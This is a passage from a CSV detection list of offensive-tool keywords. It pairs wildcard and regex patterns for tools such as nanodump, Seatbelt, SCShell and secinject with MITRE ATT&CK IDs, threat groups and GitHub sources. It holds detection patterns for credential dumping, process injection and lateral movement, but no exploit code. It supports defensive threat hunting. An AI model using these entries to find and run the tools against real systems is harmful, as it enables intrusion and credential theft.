APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*scshellbof.c*",".{0,1000}scshellbof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*scshellbof.o*",".{0,1000}scshellbof\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*scshellbofx64*",".{0,1000}scshellbofx64.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*scumjr*dirtycow-vdso*",".{0,1000}scumjr.{0,1000}dirtycow\-vdso.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*sd6aq2r6jvuoeisrudq7jbqufjh6nck5buuzjmgalicgwrobgfj4lkqd.onion*",".{0,1000}sd6aq2r6jvuoeisrudq7jbqufjh6nck5buuzjmgalicgwrobgfj4lkqd\.onion.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*Search cached MSI files in C:/Windows/Installer/*",".{0,1000}Search\scached\sMSI\sfiles\sin\sC\:\/Windows\/Installer\/.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*search_for_secrets(*",".{0,1000}search_for_secrets\(.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*Search-cpassword*",".{0,1000}Search\-cpassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Searching for master credentials (2/2)*",".{0,1000}Searching\sfor\smaster\scredentials\s\(2\/2\).{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*SearchOutlook.exe*",".{0,1000}SearchOutlook\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*searchsploit -m *",".{0,1000}searchsploit\s\-m\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*searchsploit -x *",".{0,1000}searchsploit\s\-x\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*searchsploit_rc*",".{0,1000}searchsploit_rc.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*seatbelt -*",".{0,1000}seatbelt\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*seatbelt all*",".{0,1000}seatbelt\sall.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Seatbelt* -group=all*",".{0,1000}Seatbelt.{0,1000}\s\-group\=all.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*Seatbelt.Commands.Windows*",".{0,1000}Seatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*Seatbelt.Commands.Windows*",".{0,1000}Seatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Seatbelt.exe*",".{0,1000}Seatbelt\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*Seatbelt.exe*",".{0,1000}Seatbelt\.exe.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*Seatbelt.exe*",".{0,1000}Seatbelt\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SeatbeltNet*.exe*",".{0,1000}SeatbeltNet.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*secgroundzero*",".{0,1000}secgroundzero.{0,1000}","offensive_tool_keyword","Github Username","github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/secgroundzero","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sec-inject *",".{0,1000}sec\-inject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","0","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject.cna*",".{0,1000}secinject\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject.git*",".{0,1000}secinject\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject.x64*",".{0,1000}secinject\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject.x86*",".{0,1000}secinject\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*secinject/src*",".{0,1000}secinject\/src.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*SecLists*",".{0,1000}SecLists.{0,1000}","offensive_tool_keyword","SecLists","SecLists is the security testers companion. Its a collection of multiple types of lists used during security assessments. collected in one place. List types include usernames. passwords. URLs. sensitive data patterns. fuzzing payloads. web shells. and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.","T1210.002 - T1212.001 - T1589.001","TA0040 - TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/danielmiessler/SecLists","1","1","N/A","N/A","10","53761","23323","2024-05-01T18:13:49Z","2012-02-19T01:30:18Z" "*--seclogon-leak-local*",".{0,1000}\-\-seclogon\-leak\-local.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*--seclogon-leak-remote*",".{0,1000}\-\-seclogon\-leak\-remote.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*secrary*",".{0,1000}secrary.{0,1000}","offensive_tool_keyword","Github Username","github username hosting process injection codes ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/secrary","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*secredump.exe*",".{0,1000}secredump\.exe.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","367","54","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*secret_fragment_exploit.py */_fragment*",".{0,1000}secret_fragment_exploit\.py\s.{0,1000}\/_fragment.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*SecretFinder.py*",".{0,1000}SecretFinder\.py.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*SecretFinder-master.zip*",".{0,1000}SecretFinder\-master\.zip.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" 